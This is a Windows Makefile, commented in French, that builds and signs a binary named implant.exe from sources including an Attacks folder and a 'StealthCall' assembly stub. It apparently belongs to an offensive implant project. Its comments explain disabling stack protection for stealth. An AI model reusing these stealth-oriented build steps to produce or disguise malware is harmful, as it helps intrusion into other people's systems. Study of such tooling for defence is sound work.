CC      = cl.exe
AS      = nasm.exe
PYTHON  = python.exe
SIGN_SCRIPT = .\Scripts\Sign_implant.py

# /GS- : Désactive le Security Check (Stack Canary) pour plus de furtivité
# /O2  : Optimisation vitesse
# /MT  : Lie statiquement la CRT (évite de dépendre de VCRUNTIME140.dll)
CFLAGS  = /nologo /O2 /MT /GS- /I. /I.\Lib /I.\Attacks
ASFLAGS = -f win64
LIBS    = wininet.lib ws2_32.lib user32.lib advapi32.lib ntdll.lib

ASM_OBJ = .\Lib\StealthCall.o
TARGET  = implant.exe

all: sign

$(ASM_OBJ): .\Lib\StealthCall.asm
    @echo [*] Compiling Assembly...
    $(AS) $(ASFLAGS) .\Lib\StealthCall.asm -o $(ASM_OBJ)


$(TARGET): $(ASM_OBJ)
    @echo [*] Linking Binary...
    $(CC) $(CFLAGS) .\implant.c .\helper.c .\Attacks\*.c .\Lib\*.c $(ASM_OBJ) /Fe$(TARGET) /link $(LIBS)

# Sign
sign: $(TARGET)
    @echo [*] Launching Signing Script...
    $(PYTHON) $(SIGN_SCRIPT)
    @echo [+] Done.

clean:
    @if exist $(TARGET) del /f $(TARGET)
    @if exist $(ASM_OBJ) del /f $(ASM_OBJ)
    @if exist *.obj del /f *.obj